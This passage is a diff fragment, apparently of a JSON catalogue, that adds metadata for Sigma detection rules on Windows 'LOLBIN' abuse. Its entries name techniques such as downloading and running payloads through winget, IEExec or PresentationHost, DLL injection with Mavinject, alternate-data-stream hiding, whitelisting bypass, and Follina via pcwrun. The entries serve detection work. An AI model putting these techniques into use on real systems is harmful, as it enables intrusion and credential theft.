"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_dump64.yml", + "author": "Austin Songer @austinsonger, Florian Roth", + "level": "high", + "falsepositive": [ + "Dump64.exe in other folders than the excluded one" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", + "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", + "value": "Monitoring Winget For LOLbin Execution", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ], + "creation_date": "2020/04/21", + "filename": "proc_creation_win_lolbin_execution_via_winget.yml", + "author": "Sreeman, Florian Roth, Frack113", + "level": "medium", + "falsepositive": [ + "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Extexport.exe loads dll and is execute from other folder the original path", + "uuid": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "value": "Suspicious Extexport Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extexport/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_extexport.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Download or Copy file with Extrac32", + "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", + "value": "Suspicious Extrac32 Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], + "creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_extrac32.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Extract data from cab file and hide it in an alternate data stream", + "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "value": "Suspicious Extrac32 Alternate Data Stream Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], + 
"creation_date": "2021/11/26", + "filename": "proc_creation_win_lolbin_extrac32_ads.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", + "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "value": "Abusing Findstr for Defense Evasion", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" + ], + "creation_date": "2020/10/05", + "filename": "proc_creation_win_lolbin_findstr.yml", + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Administrative findstr usage" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execute commands and binaries from the context of \"forfiles\". 
This is used as a LOLBIN for example to bypass application whitelisting.", + "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", + "value": "Use of Forfiles For Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/14", + "filename": "proc_creation_win_lolbin_forfiles.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use by a via a batch script or by an administrator." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", + "value": "Use of FSharp Interpreters", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/02", + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Legitimate use by a software developer." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "value": "LOLBIN Execution Of The FTP.EXE Binary", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_lolbin_ftp.yml", + "author": "Victor Sergeev, oscd.community", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "uuid": "1e59c230-6670-45bf-83b0-98903780607e", + "value": "Gpscript Execution", + "meta": { + "refs": [ + "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", + "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/05/16", + "filename": "proc_creation_win_lolbin_gpscript.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate uses of logon scripts distributed via group policy" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", + "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + 
"value": "Ie4uinit Lolbin Use From Invalid Path", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", + "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/05/07", + "filename": "proc_creation_win_lolbin_ie4uinit.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects execution of the IEExec utility to download payloads", + "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "value": "Abusing IEExec To Download Payloads", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml" + ], + "tags": "No established tags", + "creation_date": "2022/05/16", + "filename": "proc_creation_win_lolbin_ieexec_download.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", + "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "value": "Ilasm Lolbin Use Compile C-Sharp", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", + "https://www.echotrail.io/insights/search/ilasm.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/05/07", + "filename": "proc_creation_win_lolbin_ilasm.yml", + 
"author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", + "value": "Suspicious Execution of InstallUtil To Download", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/239", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_installutil_download.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", + "value": "JSC Convert Javascript To Executable", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/05/02", + "filename": "proc_creation_win_lolbin_jsc.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "uuid": 
"d047726b-c71c-4048-a99b-2e2f50dc107d", + "value": "Kavremover Dropped Binary LOLBIN Usage", + "meta": { + "refs": [ + "https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/11/01", + "filename": "proc_creation_win_lolbin_kavremover.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", + "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", + "value": "Launch-VsDevShell.PS1 Proxy Execution", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1535981653239255040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216.001" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the script by a developer" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "uuid": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "value": "Mavinject Inject DLL Into Running Process", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md", + "https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e", + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://twitter.com/Hexacorn/status/776122138063409152", + "https://github.com/SigmaHQ/sigma/issues/3742", + "https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.001", + "attack.t1218.013" + ], + "creation_date": "2021/07/12", + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", + "author": "frack113, Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "The \"Trace log generation tool for Media Foundation Tools\" (Mftrace.exe) can be used to execute arbitrary binaries", + "uuid": "3d48c9d3-1aa6-418d-98d3-8fd3c01a564e", + "value": "Use of Mftrace.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Mftrace/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mftrace.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/06/09", + "filename": "proc_creation_win_lolbin_mftrace.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use for tracing purposes" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects 
execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", + "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", + "value": "Execute MSDT Via Answer File", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ], + "creation_date": "2022/06/13", + "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", + "uuid": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "value": "Download Arbitrary Files Via MSOHTMED.EXE", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_msohtmed_download.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", + "value": "Download Arbitrary Files Via MSPUB.EXE", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_mspub_download.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", + "value": "LOLBIN From Abnormal Drive", + "meta": { + "refs": [ + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://www.scythe.io/library/threat-emulation-qakbot", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_not_from_c_drive.yml" + ], + "tags": [ + "attack.t1218.001" + ], + "creation_date": "2022/01/25", + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "level": "medium", + "falsepositive": [ + "Rare false positives could occur on servers with multiple drives." 
+ ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "uuid": "02b18447-ea83-4b1b-8805-714a8a34546a", + "value": "Suspicious OfflineScannerShell.exe Execution From Another Folder", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_offlinescannershell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/03/06", + "filename": "proc_creation_win_lolbin_offlinescannershell.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of OpenConsole binary as a LOLBIN to launch other binaries to bypass application Whitelisting", + "uuid": "814c95cc-8192-4378-a70a-f1aafd877af1", + "value": "Use of OpenConsole", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1537563834478645252", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/16", + "filename": "proc_creation_win_lolbin_openconsole.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use by an administrator" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Execute commands and binaries from the context of The program compatibility assistant (Pcalua.exe). 
This is used as a LOLBIN for example to bypass application whitelisting.", + "uuid": "0955e4e1-c281-4fb9-9ee1-5ee7b4b754d2", + "value": "Use of Pcalua For Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pcalua/", + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ], + "creation_date": "2022/06/14", + "filename": "proc_creation_win_lolbin_pcalua.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use by a via a batch script or by an administrator." + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", + "uuid": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", + "value": "Indirect Command Execution By Program Compatibility Wizard", + "meta": { + "refs": [ + "https://twitter.com/pabraeken/status/991335019833708544", + "https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ], + "creation_date": "2020/10/12", + "filename": "proc_creation_win_lolbin_pcwrun.yml", + "author": "A. 
Sungurov , oscd.community", + "level": "low", + "falsepositive": [ + "Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts", + "Legit usage of scripts" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", + "uuid": "6004abd0-afa4-4557-ba90-49d172e0a299", + "value": "Execute Pcwrun.EXE To Leverage Follina", + "meta": { + "refs": [ + "https://twitter.com/nas_bench/status/1535663791362519040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.execution" + ], + "creation_date": "2022/06/13", + "filename": "proc_creation_win_lolbin_pcwrun_follina.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Tools to Capture Network Packets on the windows 10 with October 2018 Update or later.", + "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", + "value": "Use of PktMon.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1040" + ], + "creation_date": "2022/03/17", + "filename": "proc_creation_win_lolbin_pktmon.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) 
files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", + "value": "Application Whitelisting Bypass via PresentationHost.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/07/01", + "filename": "proc_creation_win_lolbin_presentationhost.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate \".xbap\" being executed via \"PresentationHost\"" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "uuid": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "value": "Download Arbitrary Files Via PresentationHost.exe", + "meta": { + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/239/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_presentationhost_download.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. 
PrintBrm.exe should not be run on a normal workstation.", + "uuid": "cafeeba3-01da-4ab4-b6c4-a31b1d9730c7", + "value": "PrintBrm ZIP Creation of Extraction", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105", + "attack.defense_evasion", + "attack.t1564.004" + ], + "creation_date": "2022/05/02", + "filename": "proc_creation_win_lolbin_printbrm.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", + "uuid": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", + "value": "Pubprn.vbs Proxy Execution", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Pubprn/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_pubprn.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216.001" + ], + "creation_date": "2022/05/28", + "filename": "proc_creation_win_lolbin_pubprn.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", + "uuid": "cd3d1298-eb3b-476c-ac67-12847de55813", + "value": "DLL Execution via Rasautou.exe", + "meta": { + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", + "https://github.com/fireeye/DueDLLigence", + "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2020/10/09", + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml", + "author": "Julia Fomina, oscd.community", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", + "uuid": "cc368ed0-2411-45dc-a222-510ace303cb2", + "value": "Regasm/Regsvcs Suspicious Execution", + "meta": { + "refs": [ + "https://www.fortiguard.com/threat-signal-report/4718?s=09", + "https://lolbas-project.github.io/lolbas/Binaries/Regasm/", + "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.009" + ], + "creation_date": "2022/08/25", + "filename": "proc_creation_win_lolbin_regasm.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "uuid": "1c8774a0-44d4-4db0-91f8-e792359c70bd", + "value": "REGISTER_APP.VBS Proxy Execution", + "meta": { + "refs": [ + "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_register_app.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ], + "creation_date": "2022/08/19", + "filename": "proc_creation_win_lolbin_register_app.yml", + "author": "Nasreddine Bencherchali", + "level": 
"medium", + "falsepositive": [ + "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + ], + "logsource.category": "process_creation", + "logsource.product": "windows" + } + }, + { + "description": "Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files.", + "uuid": "4eddc365-79b4-43ff-a9d7-99422dc34b93", + "value": "Use of Remote.exe", + "meta": { + "refs": [ + "https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ], + "creation_date": "2022/06/02", + "filename": "proc_creation_win_lolbin_remote.yml", + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "level": "medium", + "falsepositive": [ + "Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg)." 
